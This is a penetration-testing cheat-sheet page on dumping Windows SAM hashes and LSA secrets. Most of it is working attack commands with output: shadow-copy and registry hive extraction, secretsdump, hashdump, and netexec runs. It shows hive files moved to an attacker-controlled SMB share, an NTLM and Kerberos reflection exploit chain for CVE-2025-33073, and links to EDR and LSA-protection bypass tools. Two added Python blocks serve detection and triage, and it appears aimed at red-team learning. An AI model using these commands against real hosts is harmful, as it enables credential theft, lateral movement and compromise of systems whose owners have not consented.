# SAM & LSA secrets

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

{% hint style="info" %}
You need at least local admin privileges on the remote target; use the **--local-auth** option if your user is a local account.
{% endhint %}


## Shadow Copies / Snapshots

{% embed url="<https://labs.itresit.es/2025/06/11/remote-windows-credential-dump-with-shadow-snapshots-exploitation-and-detection/>" %}

### Enumerate the host for shadow copy volumes

```
*Evil-WinRM* PS C:\Users\Administrator\Documents> vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Contents of shadow copy set ID: {00168<-SNIP->d07ca}
   Contained 1 shadow copies at creation time: 9/9/2019 3:10:57 AM
      Shadow Copy ID: {04639<-SNIP->b017ef}
         Original Volume: (C:)\\?\Volume{21385<-SNIP->0000}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
         Originating Machine: foo.bar.local
         Service Machine: foo.bar.local
         Provider: 'Microsoft Software Shadow Copy provider 1.0'
         Type: ClientAccessible
         Attributes: Persistent, Client-accessible, No auto release, No writers, Differential
```

```
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cmd /c mklink /d C:\VSS \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
symbolic link created for C:\VSS <<===>> \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
*Evil-WinRM* PS C:\Users\Administrator\Desktop> download C:\\VSS\\windows\\system32\\config\\SAM
                                        
Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command
                                        
Info: Downloading C:\\VSS\\windows\\system32\\config\\SAM to SAM
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\Administrator\Desktop> download C:\\VSS\\windows\\system32\\config\\SYSTEM
                                        
Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command
                                        
Info: Downloading C:\\VSS\\windows\\system32\\config\\SYSTEM to SYSTEM
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\Administrator\Desktop> download C:\\VSS\\windows\\system32\\config\\SECURITY
                                        
Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command
                                        
Info: Downloading C:\\VSS\\windows\\system32\\config\\SECURITY to SECURITY
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\Administrator\Desktop> 
```

```
$ secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL
```

With Mimikatz

{% embed url="<https://tools.thehacker.recipes/mimikatz/modules/misc/shadowcopies>" %}

## Step by step - Manual

* Create a Shadow Snapshot

```
wmic shadowcopy call create Volume='C:\'
```

```
C:\Users\peter>wmic /node:192.168.24.153 /user:peter /password:[***] shadowcopy call create Volume='C:\'
Executing (Win32_ShadowCopy)->create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ReturnValue = 0;
        ShadowID = "{037BE7D1-2915-422A-B961-13065D469BE7}";
};


C:\Users\peter>
```

* List the shadow copies to get the device path of the new snapshot

```
vssadmin list shadows
[...]
Contents of shadow copy set ID: {5590bae6-9edc-4012-b58a-5ff54e937cae}
Contained 1 shadow copies at creation time: 03/06/2025 17:12:36
Shadow Copy ID: {6efd3825-90a8-465e-8205-f445f2775769}
Original Volume: (C:)\\?\Volume{1d680c6d-69f7-4ad4-8177-b8240d0cf94c}\
Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
[...]
```

* Access the shadow snapshot and navigate to *Windows\System32\Config*. One of the easiest methods used to be 7z, but this no longer works with recent versions.

### Over SMB - Automation

Impacket's secretsdump automates the whole remote shadow-snapshot method with `-use-remoteSSMethod`:

```
impacket-secretsdump -use-remoteSSMethod "./Admin:1234@192.168.1.161"
```

## SAM

| Registry Hive   | Description                                                                                                                                                |
| --------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------- |
| `hklm\sam`      | Contains the hashes associated with local account passwords. We will need the hashes so we can crack them and get the user account passwords in cleartext. |
| `hklm\system`   | Contains the system bootkey, which is used to encrypt the SAM database. We will need the bootkey to decrypt the SAM database.                              |
| `hklm\security` | Contains cached credentials for domain accounts. We may benefit from having this on a domain-joined Windows target.                                        |

### Windows

```cmd-session
C:\WINDOWS\system32> reg.exe save hklm\sam C:\sam.save

The operation completed successfully.

C:\WINDOWS\system32> reg.exe save hklm\system C:\system.save

The operation completed successfully.

C:\WINDOWS\system32> reg.exe save hklm\security C:\security.save

The operation completed successfully.
```
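As an added example from the detection side (not code from this page or from any of the tools above), a small routine that runs over constructed process-creation events (the fields Sysmon Event ID 1 or Security 4688 provide) and matches the shadow-copy steps shown earlier in this section and the `reg save` commands just shown; the event shape, rule names and sample command lines are assumptions.

```python
import re
from collections import defaultdict

# Command-line patterns for the hive-collection steps shown on this page:
# shadow copy creation (wmic) and enumeration (vssadmin), a symlink into the shadow volume
# (mklink ... HarddiskVolumeShadowCopy), reg save of SAM/SYSTEM/SECURITY, and an esentutl hive copy.
RULES = [
    ("shadow_copy_create", re.compile(r"\bwmic(\.exe)?\b.*\bshadowcopy\s+call\s+create\b", re.I)),
    ("shadow_copy_enum", re.compile(r"\bvssadmin(\.exe)?\s+list\s+shadows\b", re.I)),
    ("shadow_volume_symlink", re.compile(r"\bmklink\b.*HarddiskVolumeShadowCopy", re.I)),
    ("registry_hive_save",
     re.compile(r"\breg(\.exe)?\s+save\s+(hklm|hkey_local_machine)\\(sam|system|security)\b", re.I)),
    ("hive_copy_esentutl", re.compile(r"\besentutl(\.exe)?\b.*\\config\\(sam|system|security)\b", re.I)),
]

# Constructed process-creation events (host, user and command line as a SIEM would carry them).
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\backupsvc", "command_line": "vssadmin list shadows"},
    {"host": "WS01", "user": "WS01\\Administrator",
     "command_line": "cmd /c mklink /d C:\\VSS \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\"},
    {"host": "WS02", "user": "CORP\\helpdesk", "command_line": "reg.exe save hklm\\sam C:\\sam.save"},
    {"host": "WS03", "user": "CORP\\alice", "command_line": "notepad.exe report.txt"},
    {"host": "WS01", "user": "WS01\\Administrator",
     "command_line": "wmic /node:192.0.2.10 shadowcopy call create Volume='C:\\'"},
]


def scan_process_events(events):
    """Return one alert dict per (event, rule) match, in event order."""
    alerts = []
    for ev in events:
        cmd = ev.get("command_line", "")
        for rule, pattern in RULES:
            if pattern.search(cmd):
                alerts.append({"host": ev["host"], "user": ev["user"],
                               "rule": rule, "command_line": cmd})
    return alerts


def escalate(alerts, min_stages=2):
    """Hosts on which at least `min_stages` distinct rules fired. A lone 'vssadmin list shadows'
    is routine backup activity; enumeration plus a symlink into the shadow volume is not."""
    stages = defaultdict(set)
    for a in alerts:
        stages[a["host"]].add(a["rule"])
    return sorted(h for h, s in stages.items() if len(s) >= min_stages)


if __name__ == "__main__":
    found = scan_process_events(SAMPLE_EVENTS)
    for a in found:
        print(f"{a['host']:<5} {a['user']:<22} {a['rule']:<22} {a['command_line']}")
    print("escalate:", escalate(found))
```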

#### Transfer files

Also see

{% content-ref url="/pages/VdH4oG0HRdKPhKMPMtsD" %}
[Download - Exfiltration](/0xss0rz/pentest/file-transfer/download-exfiltration.md)
{% endcontent-ref %}

```shell-session
$ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
```

```cmd-session
C:\> move sam.save \\10.10.15.16\CompData
        1 file(s) moved.

C:\> move security.save \\10.10.15.16\CompData
        1 file(s) moved.

C:\> move system.save \\10.10.15.16\CompData
        1 file(s) moved.
```

#### esentutl.exe

{% embed url="<https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-sam-via-esentutl.exe>" %}

### **Secretsdump**

```shell-session
$ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x4d8c7cff8a543fbf245a363d2ffce518
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:3dd5a5ef0ed25b8d6add8b2805cce06b:::
defaultuser0:1000:aad3b435b51404eeaad3b435b51404ee:683b72db605d064397cf503802b51857:::
bob:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
sam:1002:aad3b435b51404eeaad3b435b51404ee:6f8c3f4d3869a10f3b4f0522f537fd33:::
rocky:1003:aad3b435b51404eeaad3b435b51404ee:184ecdda8cf1dd238d438c4aea4d560d:::
ITlocal:1004:aad3b435b51404eeaad3b435b51404ee:f7eb9c06fafaa23c4bcf22ba6781c1e2:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb1e1744d2dc4403f9fb0420d84c3299ba28f0643
dpapi_userkey:0x7995f82c5de363cc012ca6094d381671506fd362
[*] NL$KM 
 0000   D7 0A F4 B9 1E 3E 77 34  94 8F C4 7D AC 8F 60 69   .....>w4...}..`i
 0010   52 E1 2B 74 FF B2 08 5F  59 FE 32 19 D6 A7 2C F8   R.+t..._Y.2...,.
 0020   E2 A4 80 E0 0F 3D F8 48  44 98 87 E1 C9 CD 4B 28   .....=.HD.....K(
 0030   9B 7B 8B BF 3D 59 DB 90  D8 C7 AB 62 93 30 6A 42   .{..=Y.....b.0jB
NL$KM:d70af4b91e3e7734948fc47dac8f606952e12b74ffb2085f59fe3219d6a72cf8e2a480e00f3df848449887e1c9cd4b289b7b8bbf3d59db90d8c7ab6293306a42
[*] Cleaning up... 
```
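As an added example (not from this page or from Impacket), a triage pass over output like the dump above: it parses the `uid:rid:lmhash:nthash:::` records, including the `SMB <ip> 445 <host>` prefixed form netexec prints further down, and flags blank passwords, stored LM hashes and password reuse between accounts; the sample dump and every hash other than the two well-known constants are constructed.

```python
import re
from collections import defaultdict

# Well-known constants: the LM field when no LM hash is stored, and the NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# One "user:rid:lmhash:nthash:::" record wherever it sits on the line. secretsdump prints the
# record alone; netexec/crackmapexec --sam prefixes it with "SMB  <ip>  445  <host>".
HASH_RECORD = re.compile(
    r"(?P<user>[^\s:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::"
)

# Constructed sample mixing both output styles; all hashes except the two constants are made up.
SAMPLE_DUMP = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.0.0.5        445    WS01     bob:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
SMB         10.0.0.5        445    WS01     sam:1002:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
legacy:1005:00112233445566778899aabbccddeeff:0123456789abcdef0123456789abcdef:::
[*] Dumping LSA Secrets
"""


def parse_sam_dump(text):
    """Return (user, rid, lm, nt) for every hash record in the text; other lines are ignored."""
    return [(m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower())
            for m in HASH_RECORD.finditer(text)]


def triage(text):
    """Findings worth a line in the report or a hardening ticket:
    - blank_password: NT hash of the empty password (blank password, or a disabled built-in; check the account)
    - lm_hash_stored: a real LM hash is present, so LM hash storage is still enabled on the host
    - shared_nt_hash: several accounts with the same NT hash, i.e. the same password
    """
    findings = {"blank_password": [], "lm_hash_stored": [], "shared_nt_hash": []}
    by_nt = defaultdict(list)
    for user, rid, lm, nt in parse_sam_dump(text):
        if nt == EMPTY_NT:
            findings["blank_password"].append(user)
        if lm != EMPTY_LM:
            findings["lm_hash_stored"].append(user)
        by_nt[nt].append(user)
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            findings["shared_nt_hash"].append(sorted(users))
    return findings


if __name__ == "__main__":
    for name, items in triage(SAMPLE_DUMP).items():
        print(f"{name}: {items}")
```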

With only the SAM and SYSTEM hives (no LSA secrets or cached domain credentials):

```
secretsdump -sam SAM -system SYSTEM LOCAL
```


### Metasploit

{% content-ref url="/pages/dtkGhaNT9goTjNNZVnYQ" %}
[Metasploit](/0xss0rz/pentest/tools/metasploit.md)
{% endcontent-ref %}

```
meterpreter > hashdump
```

```
meterpreter > lsa_dump_sam
```

### Netexec - CME

{% content-ref url="/pages/HNzpgVH5ZoVTvC3HBY9m" %}
[NetExec - CME](/0xss0rz/pentest/tools/netexec-cme.md)
{% endcontent-ref %}

```
nxc smb 192.168.1.0/24 -u USERNAME -p 'PASSWORDHERE' --sam
```

#### Local admin

```shell-session
$ crackmapexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --sam

SMB         10.129.42.198   445    WS01      [*] Windows 10.0 Build 18362 x64 (name:FRONTDESK01) (domain:WS01) (signing:False) (SMBv1:False)
SMB         10.129.42.198   445    WS01      [+] FRONTDESK01\bob:HTB_@cademy_stdnt! (Pwn3d!)
SMB         10.129.42.198   445    WS01      [+] Dumping SAM hashes
SMB         10.129.42.198   445    WS01      Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.42.198   445    WS01     Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.42.198   445    WS01     DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.42.198   445    WS01     WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:72639bbb94990305b5a015220f8de34e:::
SMB         10.129.42.198   445    WS01     bob:1001:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
SMB         10.129.42.198   445    WS01     sam:1002:aad3b435b51404eeaad3b435b51404ee:a3ecf31e65208382e23b3420a34208fc:::
SMB         10.129.42.198   445    WS01     rocky:1003:aad3b435b51404eeaad3b435b51404ee:c02478537b9727d391bc80011c2e2321:::
SMB         10.129.42.198   445    WS01     worker:1004:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
SMB         10.129.42.198   445    WS01     [+] Added 8 SAM hashes to the database
```

### Mimikatz

{% content-ref url="/pages/RyOH5l3XbYdEQwoowuVE" %}
[Mimikatz](/0xss0rz/pentest/tools/mimikatz.md)
{% endcontent-ref %}

### SilentSAM

Leverages raw disk access and parses the NTFS Master File Table (MFT) to read the hive files.

{% embed url="<https://github.com/ryukk33/SilentSAM>" %}

### SAMDump

{% embed url="<https://github.com/ricardojoserf/SAMDump>" %}

### SharpSAMDump

{% embed url="<https://github.com/jojonas/SharpSAMDump>" %}

### CVE-2025-33073 - NTLM Reflection

{% hint style="danger" %}
*In the context of CVE-2025-33073, machines with SMB signing enforced were not affected by the vulnerability, even without Microsoft's patch.*
{% endhint %}

**Prerequisites:**

* The target machine hasn't applied the **June 10th update**
* **SMB signing is not required** (which is the default on Windows 10, Server 2022, and older builds of Windows 11)
* **Users can add DNS records** (default configuration)

**Exploitation:**

* Add a DNS record with a crafted name (`1UWhRCA...`)
* Launch `ntlmrelayx`
* Trigger a coercion attack like **PetitPotam**

```
$ dnstool.py -u 'ASGARD.LOCAL\loki' -p loki 192.168.56.10 -a add -r srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d 192.168.56.3
[-] Adding new record
[+] LDAP operation completed successfully

$ PetitPotam.py -u loki -p loki -d ASGARD.LOCAL srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA SRV1.ASGARD.LOCAL
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

# ntlmrelayx.py -t SRV1.ASGARD.LOCAL -smb2support
[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 192.168.56.14, attacking target smb://SRV1.ASGARD.LOCAL
[*] Authenticating against smb://SRV1.ASGARD.LOCAL as / SUCCEED
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x0c10b250470be78cbe1c92d1b7fe4e91
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:df3c08415194a27d27bb67dcbf6a6ebc:::
user:1000:aad3b435b51404eeaad3b435b51404ee:57d583aa46d571502aad4bb7aea09c70:::
[*] Done dumping SAM hashes for host: 192.168.56.14
```

{% embed url="<https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025>" %}

Another method (reflective Kerberos relay):

{% embed url="<https://blog.redteam-pentesting.de/2025/reflective-kerberos-relay-attack/>" %}

1. Coercion

```
$ wspcoerce 'lab.redteam/user1:KojbyRyibdinWom)@client1.lab.redteam' \
    file:////client11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA/path
Impacket v0.13.0.dev0+20250408.175013.349160df - Copyright 2023 Fortra

[*] Connected to IPC$
[*] Opened MsFteWds pipe
[*] Sent WSP Connect
[*] Sent WSP Query
[*] Sent WSP Disconnect
```

2. Answer local name resolution queries

```
$ sudo pretender -i eth1 --no-dhcp-dns --no-timestamps \
    --spoof '*1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA*'
Pretender by RedTeam Pentesting v1.3.2-74e629fcc5
Listening on interface: eth1
IPv4 relayed to: 192.168.56.11
IPv6 relayed to: fe80::a00:27ff:fe89:bdac
Answering queries for: *1uwhrcaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaybaaaa*

[mDNS] listening via UDP on [ff02::fb%eth1]:5353
[NetBIOS] listening via UDP on 192.168.56.255:137
[LLMNR] listening via UDP on [ff02::1:3%eth1]:5355
[mDNS] listening via UDP on 224.0.0.251:5353
[LLMNR] listening via UDP on 224.0.0.252:5355
[...]
[mDNS] "client11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" (A) queried by 192.168.56.10 (client1.lab.redteam)
[mDNS] "client11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" (A) queried by fe80::6698:d1c7:60cb:8eb9 (client1.lab.redteam, 192.168.56.10)
[mDNS] "client11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" (AAAA) queried by 192.168.56.10 (PCSSystemtec)
[mDNS] "client11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" (AAAA) queried by fe80::6698:d1c7:60cb:8eb9 (client1.lab.redteam, 192.168.56.10)
[LLMNR] "client11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" (A) queried by fe80::6698:d1c7:60cb:8eb9 (client1.lab.redteam, 192.168.56.10)
[LLMNR] "client11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" (A) queried by 192.168.56.10 (client1.lab.redteam)
[LLMNR] "client11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" (AAAA) queried by fe80::6698:d1c7:60cb:8eb9 (client1.lab.redteam, 192.168.56.10)
[LLMNR] "client11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" (AAAA) queried by 192.168.56.10 (client1.lab.redteam)
```

3. Relay the ticket back to the victim

```
$ krbrelayx.py --target smb://client1.lab.redteam -c whoami
[...]
[*] SMBD: Received connection from 192.168.56.10
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Executed specified command on host: client1.lab.redteam
nt authority\system

[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry
```

More PoC:

{% embed url="<https://github.com/mverschu/CVE-2025-33073>" %}

{% embed url="<https://github.com/Wh0am123/CVE-2025-54918-POC>" %}

Example:

{% embed url="<https://seriotonctf.github.io/Pwning-Reflection-Using-NTLM-Reflection/>" %}

### Cracking

{% content-ref url="/pages/5HMI5x51XIr5GBqw1pWM" %}
[Hashes](/0xss0rz/pentest/cracking/hashes.md)
{% endcontent-ref %}

#### Online

{% embed url="<https://ntlm.pw/>" %}

### Pass the Hash (PtH)

{% content-ref url="/pages/2nk7AOHO745kf6QdjHnB" %}
[Pass the Hash (PtH)](/0xss0rz/pentest/post-exploitation/lateral-movement/pass-the-hash-pth.md)
{% endcontent-ref %}

## LSA

### Netexec - CME

{% content-ref url="/pages/HNzpgVH5ZoVTvC3HBY9m" %}
[NetExec - CME](/0xss0rz/pentest/tools/netexec-cme.md)
{% endcontent-ref %}

```shell-session
$ crackmapexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --lsa

SMB         10.129.42.198   445    WS01     [*] Windows 10.0 Build 18362 x64 (name:FRONTDESK01) (domain:FRONTDESK01) (signing:False) (SMBv1:False)
SMB         10.129.42.198   445    WS01     [+] WS01\bob:HTB_@cademy_stdnt!(Pwn3d!)
SMB         10.129.42.198   445    WS01     [+] Dumping LSA secrets
SMB         10.129.42.198   445    WS01     WS01\worker:Hello123
SMB         10.129.42.198   445    WS01      dpapi_machinekey:0xc03a4a9b2c045e545543f3dcb9c181bb17d6bdce
dpapi_userkey:0x50b9fa0fd79452150111357308748f7ca101944a
SMB         10.129.42.198   445    WS01     NL$KM:e4fe184b25468118bf23f5a32ae836976ba492b3a432deb3911746b8ec63c451a70c1826e9145aa2f3421b98ed0cbd9a0c1a1befacb376c590fa7b56ca1b488b
```

#### GMSA

If you find an account whose name starts with `_SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_`, you can recover the gMSA account behind it:

```
nxc ldap <ip> -u <user> -p <pass> --gmsa-decrypt-lsa '_SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_313e25a880eb773502f03ad5021f49c2eb5b5be2a09f9883ae0d83308dbfa724:<BASE64_LSA_SECRET>'
```

{% embed url="<https://www.netexec.wiki/ldap-protocol/extract-gmsa-secrets>" %}

### regsecrets.py

{% hint style="success" %}
*Opsec*
{% endhint %}

{% embed url="<https://www.synacktiv.com/publications/lsa-secrets-revisiting-secretsdump>" %}

{% embed url="<https://github.com/fortra/impacket/pull/1898/commits/e8f437200248b641b3baa3ce48505232287150e3#diff-26356d84553992cfb9824fdbbc8bdbaf7afb9cb0248c3adfe40c0037899b6e5f>" %}

### Bypass LSA Protection (aka Protected Process Light)

{% embed url="<https://github.com/Leo4j/PPLKiller>" %}

## Bypass EDR

{% embed url="<https://github.com/AabyssZG/HashDump-BypassEDR>" %}

## Backup Operators Group

```
whoami /groups
```

{% content-ref url="/pages/0JuIBGgnkBTBoagEgA6o" %}
[Group Privileges](/0xss0rz/pentest/privilege-escalation/windows/group-privileges.md)
{% endcontent-ref %}

### Linux

```
smbserver.py -smb2support "someshare" "./"
```

```
# reg.py "internal.abc.local"/"user":'Password'@"192.168.210.16" save -keyName 'HKLM\SAM' -o '\\10.10.14.6\someshare'
Impacket for Exegol - v0.10.1.dev1+20231106.134307.9aa9373 - Copyright 2022 Fortra - forked by ThePorgs

[!] Cannot check RemoteRegistry status. Hoping it is started...
[*] Saved HKLM\SAM to \\10.10.14.6\someshare\SAM.save


# reg.py "internal.abc.local"/"user":'Password'@"192.168.210.16" save -keyName 'HKLM\SYSTEM' -o '\\10.10.14.6\someshare'
Impacket for Exegol - v0.10.1.dev1+20231106.134307.9aa9373 - Copyright 2022 Fortra - forked by ThePorgs

[!] Cannot check RemoteRegistry status. Hoping it is started...
[*] Saved HKLM\SYSTEM to \\10.10.14.6\someshare\SYSTEM.save

# reg.py "internal.abc.local"/"user":'Password'@"192.168.210.16" save -keyName 'HKLM\SECURITY' -o '\\10.10.14.6\someshare'
Impacket for Exegol - v0.10.1.dev1+20231106.134307.9aa9373 - Copyright 2022 Fortra - forked by ThePorgs

[!] Cannot check RemoteRegistry status. Hoping it is started...
[*] Saved HKLM\SECURITY to \\10.10.14.6\someshare\SECURITY.save
```

```
secretsdump.py -sam 'SAM.save' -security 'SECURITY.save' -system 'SYSTEM.save' LOCAL
```

### Windows

```cmd-session
C:\htb> reg save HKLM\SYSTEM SYSTEM.SAV

The operation completed successfully.


C:\htb> reg save HKLM\SAM SAM.SAV

The operation completed successfully.
```

## Go-Secdump

{% embed url="<https://github.com/jfjallid/go-secdump>" %}

```
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam --lsa --dcc2
```

## Volatility3 - Hashdump

### Memory dump acquisition from the victim host - with WinPmem or FTK Imager

{% embed url="<https://volatility3.readthedocs.io/en/latest/getting-started-windows-tutorial.html>" %}

{% embed url="<https://github.com/Velocidex/WinPmem/releases/>" %}

{% embed url="<https://cpuu.hashnode.dev/how-to-perform-memory-forensic-analysis-in-windows-11-using-volatility-3>" %}

### Hashdump / Lsadump

```
./vol.py -f file.dmp windows.hashdump.Hashdump #Grab common windows hashes (SAM+SYSTEM)
./vol.py -f file.dmp windows.cachedump.Cachedump #Grab domain cache hashes inside the registry
./vol.py -f file.dmp windows.lsadump.Lsadump #Grab lsa secrets
```

{% embed url="<https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet#hashes-passwords>" %}

{% embed url="<https://youtu.be/utDjrceyy00>" %}

## Resources

{% embed url="<https://www.thehacker.recipes/a-d/movement/credentials/dumping/sam-and-lsa-secrets>" %}

{% embed url="<https://book.hacktricks.xyz/windows-hardening/stealing-credentials#stealing-sam-and-system>" %}

## Interesting Book

{% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %}
[Interesting Books](/0xss0rz/interesting-books.md)
{% endcontent-ref %}

{% hint style="info" %}
***Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.*
{% endhint %}

* [**Pentesting Active Directory and Windows-based Infrastructure**](https://www.amazon.fr/dp/1804611360?tag=0xss0rz-21)\
  Enhance your skill set to pentest against real-world Microsoft infrastructure with hands-on exercises and by following attack/detect guidelines with OpSec considerations
* [**Infrastructure Attack Strategies for Ethical Hacking**](https://www.amazon.fr/dp/8196994729?tag=0xss0rz-21)\
  Encompassing both external and internal enumeration techniques, the book delves into attacking routers and services, establishing footholds, privilege escalation, lateral movement, and exploiting databases and Active Directory.
* [**RTFM: Red Team Field Manual v2**](https://www.amazon.fr/dp/1075091837?tag=0xss0rz-21)\
  A quick reference when there is no time to scour the Internet for that perfect command
* [**Red Team Development and Operations: A practical guide**](https://www.amazon.fr/dp/B0842BMMCC?tag=0xss0rz-21)\
  The authors have moved beyond SANS training and use this book to detail red team operations in a practical guide.
* [**Cybersecurity Attacks – Red Team Strategies**](https://www.amazon.fr/dp/B0822G9PTM?tag=0xss0rz-21)\
  A practical guide to building a penetration testing program having homefield advantage

## Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.


[![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)

